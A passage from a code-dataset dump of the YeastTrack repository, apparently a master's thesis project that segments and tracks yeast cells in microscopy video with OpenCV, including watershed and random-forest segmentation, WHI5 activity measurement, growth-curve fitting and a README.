"text": "import numpy as np\nimport cv2\nfrom matplotlib import pyplot as plt\nfrom Segmentation.cellInstance import cellInstance\nfrom Segmentation.getWHI5Activity import getWHI5Activity\nfrom Segmentation.FilterDetection import filterDetections\nfrom Segmentation.OstuBinarizartion import getMaskFrame\nfrom Segmentation.getThreshold import getTherholdImage\n#watershed\n#Pre: Frame As defined in main\n#Ret1: List of cellInstanses\ndef watershed(frame):\n openingThres = 25\n\n optFrame = frame.getScaledOptChan()\n floFrame = frame.getScaledFloChan()\n\n gray = cv2.cvtColor(floFrame,cv2.COLOR_BGR2GRAY)\n\n #Thresolding\n #ret, thresh = cv2.threshold(gray,openingThres,255,cv2.THRESH_BINARY)\n thresh = getTherholdImage(frame)\n\n # noise removal\n kernel = np.ones((3,3),np.uint8)\n opening = cv2.morphologyEx(thresh,cv2.MORPH_OPEN,kernel, iterations = 2)\n opening = cv2.cvtColor(opening, cv2.COLOR_BGR2GRAY)\n # sure background area\n sureBG = cv2.dilate(opening,kernel,iterations=3)\n\n # Finding sure foreground area\n #opening = np.uint8(opening)\n #opening = cv2.convertTo(opening, CV_8UC1);\n\n distTransform = cv2.distanceTransform(opening,cv2.DIST_L2,5)\n ret, sureFG = cv2.threshold(distTransform,0.65*distTransform.max(),255,0)\n\n #Finding unknown region\n sureFG = np.uint8(sureFG)\n unknown = cv2.subtract(sureBG,sureFG)\n\n #Marker labelling\n ret, markers = cv2.connectedComponents(sureFG)\n\n markers = markers+1\n\n #Finding unknown region\n sureFG = np.uint8(sureFG)\n unknown = cv2.subtract(sureBG,sureFG)\n\n #Mark unknown region with 0\n markers[unknown==255] = 0\n\n markers = cv2.watershed(floFrame,markers)\n #markers = cv2.watershed(distTransform,markers)\n\n floFrame[markers == -1] = [0,0,255]\n\n markersShow = np.array(markers, dtype=np.uint8)\n\n markersShow = cv2.cvtColor(markersShow, cv2.COLOR_GRAY2BGR)\n markersShow[markers == -1] = [255,255,255]\n markersShow = cv2.add(markersShow,floFrame)\n cv2.imshow(\"markers\",markersShow)\n cv2.waitKey(0)\n cellInstanses = conectedCompontents(markersShow,floFrame)\n cellInstanses = filterDetections(cellInstanses)\n #print(cellInstanses)\n return(cellInstanses)\n\ndef conectedCompontents(frame,floFrame):\n #Frame to CV_8UC1\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY);\n #gray = frame\n conectedCompontents, hirearchy = cv2.findContours(gray, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n\n cellInstanses = []\n for cnt in conectedCompontents:\n whi5Activ = getWHI5Activity(cnt,floFrame)\n cellInstans = cellInstance(cnt,whi5Activ)\n cellInstanses.append(cellInstans)\n\n return(cellInstanses)\n"
},
{
"alpha_fraction": 0.6392405033111572,
"alphanum_fraction": 0.7041139006614685,
"avg_line_length": 34.11111068725586,
"blob_id": "eb01da0fdbddc60a4ef2930be43eac59c8a3c698",
"content_id": "de26939d4ffa4fe59e65ce0501444159efda7bcd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 632,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 18,
"path": "/UserInterface/getInstantSegmentImage.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\nfrom UserInterface.getMaskImage import getMaskImage\n\n#color all the blobs with individual colors\n#Text size for all cells\ndef getCellInstImage(listOfCellInstances,sizeX,sizeY):\n colorSet = [(0,7,100),(32,107,203),(237, 120, 255),(255, 170,0),(100,2,100)]\n\n drawing = np.zeros((sizeX,sizeY, 3), np.uint8)\n\n for cellInstances in listOfCellInstances:\n cnt = cellInstances.getContour()\n convexHull = cv2.convexHull(cnt, False)\n col = colorSet[trackedCell.getCellID() % len(colorSet)]\n drawing = cv2.fillPoly(drawing, pts =[convexHull], color=col)\n\n return(drawing)\n"
},
{
"alpha_fraction": 0.7641723155975342,
"alphanum_fraction": 0.7653061151504517,
"avg_line_length": 29.413793563842773,
"blob_id": "79d19631edf426ae8d14fba768df79ddafebeee0",
"content_id": "14c530ecdb9fbd1bd011b474544c8abdebce36ef",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 882,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 29,
"path": "/Segmentation/RandomForestSegmentaion.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from Segmentation.ParmeterizeImagegs import imagesToPrameter\nimport pickle\nimport cv2\nfrom matplotlib import pyplot as plt\nfrom Segmentation.ConectedComponents import conectedCompontents\nfrom Segmentation.FilterDetection import filterDetections\n\n#Pre: Frame\n#Ret: CellInstances in that frame\ndef rfSegmentetion(Frame):\n optImg = Frame.getOptImage()\n floImg = Frame.getFloImage()\n\n #Make Images To Parameters\n parm = imagesToPrameter(optImg,floImg)\n #Load Random Forest model\n rfModel = pickle.load(open(\"Segmentation/YeastCellRFModel\", 'rb'))\n\n #Predic Segemt With Model\n result = rfModel.predict(parm)\n result = result.reshape((optImg.shape))\n\n #Grow Erode?? \n\n #Use Conected Components\n cellInstances = conectedCompontents(result,floImg)\n cellInstances = filterDetections(cellInstances)\n #Return Cell instance\n return(cellInstances)\n"
},
{
"alpha_fraction": 0.6524032950401306,
"alphanum_fraction": 0.6828839182853699,
"avg_line_length": 34.54166793823242,
"blob_id": "0b74b284dbe39f11aac24b427044c8bfe5c9e952",
"content_id": "5dd07dbd71aa452fdb1aa45276bec5582e05cdab",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1706,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 48,
"path": "/UserInterface/getMaskImage.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\n\n#Pre: VideoFrame\n#Ret: White on black maskFrame\ndef getMaskImage(frame):\n frame = otsuThreshold(frame)\n maskFrame = convexHull(frame)\n return(maskFrame)\n\ndef otsuThreshold(frame):\n gray = cv2.cvtColor(frame,cv2.COLOR_BGR2GRAY)\n #apply thresholding\n gotFrame, thresh = cv2.threshold(gray,0,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n return(thresh)\n\n#Pre: takes An image Black and white\n#Ret: Returns Image with conexHull filled of all wite separated images\ndef convexHull(frame):\n # Finding contours for the thresholded image\n\n contours, hierarchy = cv2.findContours(frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n #im2, contours, hierarchy = cv2.findContours(frame, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)\n # create hull array for convex hull points\n hull = []\n # calculate points for each contour\n for i in range(len(contours)):\n # creating convex hull object for each contour\n hull.append(cv2.convexHull(contours[i], False))\n\n # create an empty black image\n drawing = np.zeros((frame.shape[0], frame.shape[1], 3), np.uint8)\n\n # draw contours and hull points\n for i in range(len(contours)):\n color_contours = (0, 255, 0) # green - color for contours\n color = (255, 0, 0) # blue - color for convex hull\n # draw ith contour\n cv2.drawContours(drawing, contours, i, color_contours, 1, 8, hierarchy)\n # draw ith convex hull object\n cv2.drawContours(drawing, hull, i, color, 1, 8)\n\n for i in range(len(contours)):\n drawing = cv2.fillPoly(drawing, pts =[hull[i]], color=(255,255,255))\n\n return(drawing)\n #cv2.imshow(\"ConvexHull\",drawing)\n #cv2.waitKey(0)\n"
},
{
"alpha_fraction": 0.6657534241676331,
"alphanum_fraction": 0.6657534241676331,
"avg_line_length": 51,
"blob_id": "007688859d5512537e8ae666b588e6ec1b0349eb",
"content_id": "2427e99546058104b399c38df6075e847f12fa9e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 365,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 7,
"path": "/Analysis/PrintMotherDoughter.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "\ndef printMotherDoghuther(trackedCells):\n for trackedCell in trackedCells:\n doughterID = trackedCell.getCellID()\n motgherID = trackedCell.getMotherCell()\n relatabelityFactor = trackedCell.getRelatabelityFactor()\n print(\"M: \" + str(motgherID) + \" --> \" + \"D: \" + str(doughterID))\n print(\"RelFactor: \" + str(relatabelityFactor))\n"
},
{
"alpha_fraction": 0.5702410936355591,
"alphanum_fraction": 0.6209476590156555,
"avg_line_length": 25.15217399597168,
"blob_id": "587974ceff3697d46b71e494aab41c417fd76e3c",
"content_id": "525a7dd51f0050916c11efecf7d56b7fe71ab191",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1203,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 46,
"path": "/Analysis/FitExponential.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport scipy.optimize as op\nfrom matplotlib import pyplot as plt\n\ndef func(x,const,rate):\n return(const*np.exp(rate*x))\n\ndef fitExponential(array):\n print(len(array))\n fx = np.array(range(len(array)))\n fy = np.array(array)\n\n popt, pcov = op.curve_fit(func,fx,fy,p0=(fx[0], 0.1),maxfev = 6000)\n\n plt.plot(fx, fy, 'x', label='data')\n plt.plot(fx, func(fx, *popt), label='curve-fit')\n plt.legend(loc='upper left')\n\n return(popt)\n\n\n#Put in epo in size plot\ndef plotDataWithExpo(array):\n xArr = range(0,31)\n const = 5.3338403*1000\n rate = 2.1211569/100\n yArr = []\n for i in range(len(xArr)):\n yArr.append(func(i,const,rate))\n plt.plot(xArr, yArr,color='C1',label=\"exponential fit\")\n\n const = 8.493409*1000\n rate = 5.3318/1000\n xArr = range(36,95)\n yArr = []\n for i in range(len(xArr)):\n yArr.append(func(i,const,rate))\n plt.plot(xArr, yArr,color='C2',label=\"exponential fit\")\n plt.plot(range(len(array)), array,'x',color='C0',label= \"data\")\n plt.ylabel('Growth Curves with exponential fit')\n plt.xlabel('Time')\n plt.title(\"Size\")\n plt.xticks([])\n plt.yticks([])\n plt.legend()\n plt.show()\n"
},
{
"alpha_fraction": 0.6095238327980042,
"alphanum_fraction": 0.644444465637207,
"avg_line_length": 27.636363983154297,
"blob_id": "8d3e51a5cda09d0df2e85bfd68f624d5c47d0b9c",
"content_id": "c393b41ea69624f3f3bef08e579f6ef58a6d53b1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 315,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 11,
"path": "/Analysis/getDevisionFrameNum.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "#Returnsfirst Whi5 activation Index\ndef getDevisionFrameNum(doughter):\n thresh = 0.30\n cellWhi5Trace = doughter.getWhi5Trace()\n index = 0\n for whi5 in cellWhi5Trace:\n index = index + 1\n if whi5 > thresh:\n index = index+doughter.getDetectionFrameNum()\n \n return(index)\n"
},
{
"alpha_fraction": 0.7659574747085571,
"alphanum_fraction": 0.7765957713127136,
"avg_line_length": 15.412698745727539,
"blob_id": "a461a0f0c7ce424a739fa4811c6d6d9122f36b80",
"content_id": "2060a246ba5f03ebd5fb65d317b7961bd95aa63d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1034,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 63,
"path": "/README.md",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "# Yeast Track\n\nMaster Thesis Work. Tracking Yeast.\n\n### Prerequisites\n\nThis Project Was created using Python 3.6.9 and OpenCV\n\nDependencies can be intalled using pip.\nFor image analysis.\npip3 install opencv-python\nFor Graph ploting.\npip3 install networkx\n\nAlso For loading .lif files the Bioformats Command Line Tools is needed.\nCan be dowloaded at https://downloads.openmicroscopy.org/bio-formats/6.5.0/artifacts/bftools.zip\n\n## Install\n\ninstall python:\nEx: sudo apt install python\n\nInstal Pacakge Manger:\nEx: sudo apt install python3-pip\n\nInstall Requierments:\npip install requierments.txt\n\n## Running\n\nCode Can be run in python\n\nPython3 main.py\n\nThis loads the program with the file specified in loadData.py\n\n## Controlls\n\nOnce the program is running the program can be controled by hitting following buttons.\n\nq = quit\n\ns = Show Segmentation\n\no = show Opt Chan\n\ni = show cell ID\n\nw = show WHI5 Activ Threshold\n\nl = Print Lineage\n\np = Plot Data.\n\n\n## TODO\n\nUserInterface\nSegmentation\nTracking\nLoad Data\nCroping alternative\nTesting\n"
},
{
"alpha_fraction": 0.6639118194580078,
"alphanum_fraction": 0.7203856706619263,
"avg_line_length": 33.57143020629883,
"blob_id": "19942d747379e8840409409ddc4a1e0cd5b9be84",
"content_id": "f928463f7020dbfa9bee94acf9a6e84f81022761",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 726,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 21,
"path": "/UserInterface/getClassImage.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\nfrom UserInterface.getMaskImage import getMaskImage\nfrom UserInterface.rescaleImageToUser import rescaleImageToUser\n\n#color all the blobs with individual colors\n#Text size for all cells\ndef getClassImage(listOfObjects,sizeX,sizeY):\n colorSet = [(0,7,100),(32,107,203),(237, 120, 255),(255, 170,0),(100,2,100)]\n\n classImg = np.zeros((sizeX,sizeY, 3), np.uint8)\n\n for trackedCell in listOfObjects:\n cnt = trackedCell.getContour()\n convexHull = cv2.convexHull(cnt, False)\n col = colorSet[trackedCell.getCellID() % len(colorSet)]\n classImg = cv2.fillPoly(classImg, pts =[convexHull], color=col)\n\n classImg = rescaleImageToUser(classImg)\n\n return(classImg)\n"
},
{
"alpha_fraction": 0.659745454788208,
"alphanum_fraction": 0.7026121616363525,
"avg_line_length": 32.931819915771484,
"blob_id": "0c69a2db4f3a7b245a185ac7d5b54a69d426198c",
"content_id": "c69754ce33ec139bb9d13db5899e791d6bf24b8e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1493,
"license_type": "no_license",
"max_line_length": 85,
"num_lines": 44,
"path": "/Segmentation/getWHI5Activity.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\n\n#Pre1: Keypoint All cells\n#Pre2: Mask Frame With cells\n#Pre3: Florecent Chanell\n#Ret: Array with numberes corresponding to WHI5 Activity\ndef getWHI5ActivityNorm(countour, floChan):\n #convexHull = cv2.ConvexHull2(countour,orientation=CV_CLOCKWISE, return_points=0)\n convexHull = cv2.convexHull(countour, False)\n\n drawing = np.zeros((floChan.shape[0], floChan.shape[1], 1), np.uint8)\n\n drawing = cv2.fillPoly(drawing, pts =[convexHull], color=(255))\n\n #Take intesection floChan and convexHull\n mask_out = cv2.subtract(drawing,floChan)\n\n mask_out = cv2.subtract(drawing,mask_out)\n whi5Activ = cv2.sumElems(mask_out)\n\n moments = cv2.moments(countour)\n area = moments['m00']\n whi5Activ = whi5Activ[1]/area/255\n return(whi5Activ)\n\ndef getWHI5Activity(countour, floChan):\n #convexHull = cv2.ConvexHull2(countour,orientation=CV_CLOCKWISE, return_points=0)\n convexHull = cv2.convexHull(countour, False)\n\n drawing = np.zeros((floChan.shape[0], floChan.shape[1], 1), np.uint8)\n\n drawing = cv2.fillPoly(drawing, pts =[convexHull], color=(255))\n\n #print(\"Got gray in get getWHI5Activity\")\n drawing = np.zeros((floChan.shape[0], floChan.shape[1], 1), np.uint8)\n drawing = cv2.fillPoly(drawing, pts =[convexHull], color=(255))\n mask_out=cv2.subtract(drawing,floChan)\n\n mask_out=cv2.subtract(drawing,mask_out)\n #cv2.imshow(\"mask \",mask_out)\n #cv2.waitKey(0)\n whi5Activ = mask_out[...].max()/255\n return(whi5Activ)\n"
},
{
"alpha_fraction": 0.7591836452484131,
"alphanum_fraction": 0.777550995349884,
"avg_line_length": 39.83333206176758,
"blob_id": "fdd3a15e818233aa98bc8fb523f73ac0cba2da30",
"content_id": "ef2a2e5a2f206b88dd88fdab23918e4a787660e5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 490,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 12,
"path": "/Segmentation/ConectedComponents.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nfrom Segmentation.getWHI5Activity import getWHI5Activity\nfrom Segmentation.cellInstance import cellInstance\n\ndef conectedCompontents(maskImg,floImg):\n conectedCompontents, hirearchy = cv2.findContours(maskImg, cv2.RETR_CCOMP, cv2.CHAIN_APPROX_SIMPLE)\n cellInstanses = []\n for cnt in conectedCompontents:\n whi5Activ = getWHI5Activity(cnt,floImg)\n cellInstans = cellInstance(cnt,whi5Activ)\n cellInstanses.append(cellInstans)\n return(cellInstanses)\n"
},
{
"alpha_fraction": 0.7299578189849854,
"alphanum_fraction": 0.7362869381904602,
"avg_line_length": 38.5,
"blob_id": "e20db360a36e965c5850b35560a71a455c7e7867",
"content_id": "0e29bca900d034aa39b5cc2990e56c6e1d2543e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 474,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 12,
"path": "/Analysis/AddBudsToMother.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from Anlysis.getDevisionFrameNum import getDevisionFrameNum\n\n#Pre1: Mother Tracked CellTrackel\n#Pre2: list Doughters\ndef addBudsToMother(mother,doughters):\n sizeTrace = mother.getSizesTraceFromBegining()\n for dought in doughters:\n deviNum = getDevisionFrameNum(dought)\n dughtSzTrc = dought.getSizesTraceFromBegining()[0:deviNum]\n for i in range(min(len(sizeTrace),len(dughtSzTrc))):\n sizeTrace[i] += dughtSzTrc[i]\n return(sizeTrace)\n"
},
{
"alpha_fraction": 0.8525252342224121,
"alphanum_fraction": 0.8545454740524292,
"avg_line_length": 28.117647171020508,
"blob_id": "4b3f1ae0d1d479581366c5a2c88fba0cb765caf5",
"content_id": "5980013f821fe26b79147cfaaea479b8f93bd6f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 495,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 17,
"path": "/main.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "#Yeast Track Main\nimport cv2\n#from UserInterface.videoClass import Video\nfrom UserInterface.LoadData.LoadData import getVideo\nfrom UserInterface.LoadData.LoadtifFile import imortTiftoVideoNew\nfrom UserInterface.Controls import Controls\nfrom UserInterface.LoadData.ImportThreeZoomLevel import loadThreeZoomLevel\nfrom UserInterface.LoadData.LoadChannels import loadChannels\n\n#video = loadThreeZoomLevel()\nvideo = loadChannels()\n\nvideo.runTracking()\n\ncntrl = Controls(video)\n\ncntrl.startControls()\n"
},
{
"alpha_fraction": 0.6702127456665039,
"alphanum_fraction": 0.6852836608886719,
"avg_line_length": 24.066667556762695,
"blob_id": "7355772dbfc4490543142dc8b2fecdf5071256af",
"content_id": "fa328815ea0ee521a5e6d148a79bb0c9af40cf75",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1128,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 45,
"path": "/UserInterface/rescaleImageToUser.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\n\n#Scale image For Visual Apropriate Size\n#Pre: image\n#Ret: Scaled image\ndef rescaleImageToUser(img):\n prop = getScaleProprtion(img.shape)\n szX = int(img.shape[1]/prop)\n szY = int(img.shape[0]/prop)\n dim = (szX, szY)\n img = cv2.resize(img, dim, interpolation = cv2.INTER_AREA)\n return(img)\n\n#Pre1: Centroid\n#Pre2: frame\n#Ret: REscaled cetroid\ndef rescalePosToUser(centroid,imgShape):\n prop = getScaleProprtion(imgShape)\n (centerX,centerY) = centroid\n #print(centroid)\n centerX = int(centerX/prop)\n centerY = int(centerY/prop)\n centroid = (centerX,centerY)\n #print(centroid)\n return(centroid)\n\ndef rescaleCounur(contour,imgShape):\n scaledCnt = []\n for cntPt in contour:\n cntPt = cntPt[0]\n cntPt = rescalePosToUser(cntPt,imgShape)\n scaledCnt.append(cntPt)\n return(scaledCnt)\n\n\n#Gives Scale proportion\n#Pre: image shape\n#Ret: Proportion to scale to get good visual\ndef getScaleProprtion(imgSape):\n userSzX = 1200\n userSzY = 800\n xSzProp = imgSape[1]/userSzX\n ySzProp = imgSape[0]/userSzY\n prop = max(xSzProp,ySzProp)\n return(prop)\n"
},
{
"alpha_fraction": 0.670536994934082,
"alphanum_fraction": 0.6966618299484253,
"avg_line_length": 40.75757598876953,
"blob_id": "74dbf69d2966d711b8abd5fcfbe873c4e1afcab6",
"content_id": "912d33ea9ad9e48a4eb5f6167c56a5aed34007da",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1378,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 33,
"path": "/UserInterface/getIDImage.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import cv2\nimport numpy as np\nfrom UserInterface.rescaleImageToUser import rescaleImageToUser\nfrom UserInterface.rescaleImageToUser import rescalePosToUser\nfrom UserInterface.rescaleImageToUser import rescaleCounur\nfrom Tracking.GetPositionFromContour import getPositionFromContour\n\n#Pre1: list of objects\n#Pre2: frame\ndef getIDImage(listOfObjects,frame):\n szX = frame.xSz\n szY = frame.ySz\n numCol = 3\n idImg = np.zeros((szX,szY, numCol), np.uint8)\n idImg = rescaleImageToUser(idImg)\n #Loop over the tracked objects\n for trackedCell in listOfObjects:\n #Draw both the ID of the object and the centroid\n idText = \"ID \" + str(trackedCell.getCellID())\n (centerX,centerY) = trackedCell.getCentroid()\n #contour = trackedCell.getContour()\n #contour = rescaleCounur(contour,[szX,szY])\n #(centerX,centerY) = getPositionFromContour(contour)\n (centerX,centerY) = rescalePosToUser((centerX,centerY),frame.getOptImage().shape)\n #Put Text and Cetroid\n #print(idText)\n #print((centerX,centerY))\n cv2.putText(idImg, idText, (centerX-10,centerY-25),cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 255, 0), 2)\n cv2.circle(idImg, (centerX,centerY), 10, (0, 255, 0), -1)\n #cv2.circle(idImg, (centerX,centerY), 1, (0, 255, 0), -1)\n #idImg = rescaleImageToUser(idImg)\n #Return\n return(idImg)\n"
},
{
"alpha_fraction": 0.7185025215148926,
"alphanum_fraction": 0.7271418571472168,
"avg_line_length": 26.235294342041016,
"blob_id": "ae83c9c3fa08fc0427b0a39a8d1812d719aa7200",
"content_id": "b70fe4f074f85f1c70b7c56336304b172fc23569",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2778,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 102,
"path": "/Tracking/TrackedCell.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "import numpy as np\nfrom Segmentation.cellInstance import cellInstance\n\nclass TrackedCell():\n\n\tdef __init__(self, cellInst = -1, cellID = -1,detectionFrameNum = -1):\n\t\tself.cellTrace = []\n\t\tself.cellTrace.append(cellInst)\n\t\tself.cellID = cellID\n\t\tself.detectionFrameNum = detectionFrameNum\n\t\tself.motherID = None\n\t\tself.relatabelityFactor = 0\n\n\tdef update(self ,cellInst = -1):\n\t\t\tif(cellInst == -1):\n\t\t\t\tcellInst = self.cellTrace[-1]\n\t\t\t\tself.cellTrace.append(cellInst)\n\t\t\tself.cellTrace.append(cellInst)\n\n\tdef setMotherCell(self,motherID,relatabelityFactor = -1):\n\t\tself.motherID = motherID\n\t\tself.relatabelityFactor = relatabelityFactor\n\n\tdef getMotherCell(self):\n\t\treturn(self.motherID)\n\n\tdef getRelatabelityFactor(self):\n\t\treturn(self.relatabelityFactor)\n\n\tdef getDetectionFrameNum(self):\n\t\treturn(self.detectionFrameNum)\n\n\tdef getContour(self,pos = -1):\n\t\tif(pos > 0 and pos > self.detectionFrameNum):\n\t\t\tpos = pos - self.detectionFrameNum\n\n\t\t#If pos < detectionFrameNum here means want pos before cell was detected give first instance\n\t\tif(pos < self.detectionFrameNum and pos > 0):\n\t\t\t#return Early\n\t\t\treturn(self.cellTrace[0].getContour())\n\n\t\t#If pos >= len(cellTrace) want position of cell after it have disaperd\n\t\tif(pos >= len(self.cellTrace)):\n\t\t\t#Return earlt latest instace\n\t\t\treturn(self.cellTrace[-1].getContour())\n\n\t\treturn(self.cellTrace[pos].getContour())\n\n\tdef getCellID(self):\n\t\treturn(self.cellID)\n\n\t#Ret No Arg: latest registered poistion\n #Ret Arg: position at that frame number\n\tdef getCentroid(self, pos = -1):\n\t\tif(pos > 0 and pos > self.detectionFrameNum):\n\t\t\tpos = pos - self.detectionFrameNum\n\n\t\t#If pos < detectionFrameNum here means want pos before cell was detected give first instance\n\t\tif(pos < self.detectionFrameNum and pos > 0):\n\t\t\t#return Early\n\t\t\treturn(self.cellTrace[0].getPosition())\n\n\t\t#If pos >= len(cellTrace) want position of cell after it have disaperd\n\t\tif(pos >= len(self.cellTrace)):\n\t\t\t#Return earlt latest instace\n\t\t\treturn(self.cellTrace[-1].getPosition())\n\n\t\treturn(self.cellTrace[pos].getPosition())\n\n\tdef getSizesTrace(self):\n\t\tsizeTrace = []\n\t\tfor cellInst in self.cellTrace:\n\t\t\tsizeTrace.append(cellInst.getSize())\n\t\treturn(sizeTrace)\n\n\tdef getSizesTraceFromBegining(self):\n\t\tsizeTrace = []\n\t\tfor i in range(self.detectionFrameNum):\n\t\t\tsizeTrace.append(0)\n\t\tfor cellInst in self.cellTrace:\n\t\t\tsizeTrace.append(cellInst.getSize())\n\t\treturn(sizeTrace)\n\n\tdef getWhi5Trace(self):\n\n\t\twhi5Trace = []\n\n\t\tfor cellInst in self.cellTrace:\n\t\t\twhi5Trace.append(cellInst.getWHI5Activity())\n\n\t\treturn(whi5Trace)\n\n\tdef getPosTrace(self):\n\n\t\txPosTrace = []\n\t\tyPosTrace = []\n\t\tfor cellInst in self.cellTrace:\n\t\t\t(xPos, yPos) = cellInst.getPosition()\n\t\t\txPosTrace.append(xPos)\n\t\t\tyPosTrace.append(yPos)\n\n\t\treturn(xPosTrace,yPosTrace)\n"
},
{
"alpha_fraction": 0.6690460443496704,
"alphanum_fraction": 0.6765087842941284,
"avg_line_length": 34.425289154052734,
"blob_id": "bf9a512751e338272ae8fed29c23dd1da3785803",
"content_id": "69b72e6288ff4666334f173a608fe60216572307",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3082,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 87,
"path": "/Analysis/plotSize.py",
"repo_name": "Klas96/YeastTrack",
"src_encoding": "UTF-8",
"text": "from matplotlib import pyplot as plt\n#from Anlysis.plotSize import plotTrackCellSizeBudToMother\nfrom Anlysis.FitExponential import fitExponential\nfrom Anlysis.FitExponential import plotDataWithExpo\nfrom Anlysis.AddBudsToMother import addBudsToMother\nfrom Anlysis.PlotTrackedCellsSize import plotTrackedCellsSize\n\n#Pre1: List of number with cells to be ploted\n#Pre2:\ndef plotTrackCellSizeBudToMother(cellToPlot, trackedCells):\n szTrc = []\n #add to Mother trace\n #return mother trace\n for mother in trackedCells:\n szTrc = []\n cellID = mother.getCellID()\n #find Doughter cells\n if any(cellID == i for i in cellToPlot):\n #Get doughters\n doughters = findDoughetCells(mother, trackedCells)\n #doughters = []\n szTrc = addBudsToMother(mother,doughters)\n plotTrackedCellsSize(doughters)\n\n #plt.show()\n plt.plot(range(len(szTrc)),szTrc, label=\"ID \" + str(cellID))\n plt.ylabel('Growth Curves')\n plt.xlabel('Time')\n plt.title(\"Size\")\n plt.xticks([])\n plt.yticks([])\n plt.legend()\n plt.show()\n\n\ndef addBudToMother(mother,trackedCells,idOfBuds):\n motherCellTrace = mother.getSizesTrace()\n for trCell in trackedCells:\n cellID = trCell.getCellID()\n if any(cellID == i for i in idOfBuds):\n motherCellTrace = addBudtoMother(mother,trCell)\n return(motherCellTrace)\n\ndef findDoughetCells(mother, trackedCells):\n motherID = mother.getCellID()\n doughters = []\n for trCell in trackedCells:\n if motherID == trCell.getMotherCell():\n doughters.append(trCell)\n return(doughters)\n\n\ndef addBudtoMotherOOOLD(motherTrace,doughter):\n deviInst = getDevisionInst(doughter)\n deviInst = 157\n doughterSizeTrace = doughter.getSizesTrace()\n doughterDetectFrame = 157 - len(doughterSizeTrace)\n startIt = doughterDetectFrame-(157-len(motherTrace))\n #print(startIt)\n for dSzI in range(len(doughterSizeTrace)):\n dSz = doughterSizeTrace[dSzI]\n motherTrace[startIt+dSzI] = motherTrace[startIt+dSzI] + dSz\n #param = fitExponential(motherTrace[(deviInst-len(doughterSizeTrace)):deviInst])\n return(motherTrace)\n\ndef addBudtoMother(motherTrace,doughter):\n deviInst = getDevisionInst(doughter)\n doughterSizeTrace = doughter.getSizesTrace()[:deviInst]\n for dSzI in range(len(doughterSizeTrace)):\n dSz = doughterSizeTrace[-dSzI]\n motherTrace[deviInst-dSzI] = motherTrace[deviInst-dSzI] + dSz\n #param = fitExponential(motherTrace[(deviInst-len(doughterSizeTrace)):deviInst])\n return(motherTrace)\n\n#Returnsfirst Whi5 activation Index\ndef getDevisionInst(doughter):\n thresh = 0.30\n cellWhi5Trace = doughter.getWhi5Trace()\n index = 0\n for whi5 in cellWhi5Trace:\n index = index + 1\n if whi5 > thresh:\n index = index+doughter.getDetectionFrameNum()\n colorsd = 'C1'\n plt.axvline(x=index, color=colorsd, linestyle='--')\n break\n return(index)\n"
},
{
"alpha_fraction": 0.6584615111351013,
"alphanum_fraction": 0.670769214630127,
